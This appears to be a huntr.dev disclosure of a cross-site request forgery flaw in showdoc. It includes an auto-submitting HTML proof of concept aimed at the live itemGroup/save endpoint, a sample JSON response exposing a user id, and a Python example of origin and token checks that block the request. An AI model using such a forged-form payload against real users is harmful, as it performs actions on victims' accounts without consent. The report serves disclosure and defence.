
Cross-Site Request Forgery (CSRF) in star7th/showdoc

2021-11-21 03:44:13
khanhchauminh
www.huntr.dev
8

EPSS 0.001 (Low), percentile 47.4%

Description

An attacker can create a new group for any item on behalf of a user who visits the attacker's website. Furthermore, the user's id ("uid") is exposed in the JSON response.

The CSRF protection can be bypassed by placing the payload in an iframe or a standalone HTML file and sending that to the victim.

Proof of Concept

Poc.html

<html>
  <body>
    <script>history.pushState('', '', '/')</script>
    <form action="https://www.showdoc.com.cn/server/index.php?s=/api/itemGroup/save" method="POST">
      <input type="hidden" name="group_name" value="testcsrf" />
      <input type="hidden" name="id" value="" />
      <input type="hidden" name="item_ids" value="1704644990568304" />
      <input type="submit" value="Submit request" />
    </form>
    <script>
      document.forms[0].submit();
    </script>
  </body>
</html>

Steps to Reproduce

1. Open PoC.html in any browser.
2. Check that a new group named testcsrf has been created and that the item with id=1704644990568304 has been added to that group.
Furthermore, the user id uid is exposed in the JSON response:

{"error_code":0,"data":{"id":"2002","uid":"359287","group_name":"testcsrf","item_ids":"1704644990568304","s_number":"0","created_at":"2021-11-21 12:10:25","updated_at":"2021-11-21 12:10:25"}}
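The request in the PoC above succeeds because the endpoint accepts any POST that carries the victim's session cookie. The following is an added illustration of the server-side check that blocks it; it is not showdoc's code (showdoc is PHP, this is framework-agnostic Python) and it assumes a server-side session dict, an ALLOWED_ORIGINS set with the site's own origin, and a constructed attacker origin (attacker.example). It replays the PoC form post and a legitimate post from the site's own page against the check.

```python
import hmac
import secrets
from urllib.parse import urlsplit

# Origins allowed to issue state-changing requests to this instance.
# Constructed for this example; a real deployment lists its own host(s).
ALLOWED_ORIGINS = {"https://www.showdoc.com.cn"}


def issue_csrf_token(session: dict) -> str:
    """Create a per-session secret and store it; the site's pages embed it in
    forms. The value lives in the server-side session, so a cross-site form
    on the attacker's page cannot read it and cannot submit the right one."""
    token = secrets.token_urlsafe(32)
    session["csrf_token"] = token
    return token


def origin_allowed(headers: dict) -> bool:
    """Reject a POST unless its Origin (or, failing that, Referer) belongs to
    the site. Browsers add Origin to cross-site form posts and page script
    cannot change it; the history.pushState('', '', '/') call in the PoC only
    rewrites the visible path within the attacker's own origin."""
    origin = headers.get("Origin")
    if origin is None:
        referer = headers.get("Referer")
        if referer is None:
            return False  # no provenance at all: fail closed
        parts = urlsplit(referer)
        origin = f"{parts.scheme}://{parts.netloc}"
    return origin in ALLOWED_ORIGINS


def token_valid(form: dict, session: dict) -> bool:
    """Compare the submitted token with the session's copy in constant time."""
    expected = session.get("csrf_token")
    submitted = form.get("csrf_token")
    if not expected or not submitted:
        return False
    return hmac.compare_digest(expected, submitted)


def is_csrf_safe(headers: dict, form: dict, session: dict) -> bool:
    """Both checks must pass for a state-changing endpoint such as
    /api/itemGroup/save. Defence in depth: if a proxy strips Origin/Referer
    the token still protects; if a token leaks, the origin check still holds."""
    return origin_allowed(headers) and token_valid(form, session)


def demo() -> dict:
    """Replay the PoC request and a legitimate one. Session, cookie and
    header values are constructed sample data."""
    session = {}
    token = issue_csrf_token(session)

    # The PoC form: auto-submitted from the attacker's page, carries no token.
    # The browser sends Origin: https://attacker.example on such a POST.
    poc_headers = {"Origin": "https://attacker.example",
                   "Cookie": "PHPSESSID=victim-session"}
    poc_form = {"group_name": "testcsrf", "id": "",
                "item_ids": "1704644990568304"}

    # Same fields submitted from the site's own page, with the embedded token.
    legit_headers = {"Origin": "https://www.showdoc.com.cn",
                     "Cookie": "PHPSESSID=victim-session"}
    legit_form = dict(poc_form, csrf_token=token)

    # Correct origin header but a guessed token: still rejected.
    guessed_form = dict(poc_form, csrf_token="x" * 43)

    return {
        "poc": is_csrf_safe(poc_headers, poc_form, session),
        "legit": is_csrf_safe(legit_headers, legit_form, session),
        "guessed_token": is_csrf_safe(legit_headers, guessed_form, session),
    }


if __name__ == "__main__":
    print(demo())  # {'poc': False, 'legit': True, 'guessed_token': False}
```

Marking the session cookie SameSite=Lax (or Strict) stops the browser from attaching it to the cross-site POST in the first place and is worth adding alongside the token. For the second finding in this report, the response to the save call should return only what the client needs; there is no reason for it to echo the caller's uid.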

Video PoC

You can check my video PoC here: PoC

Impact

This can result in the exposure of data or unintended code execution.
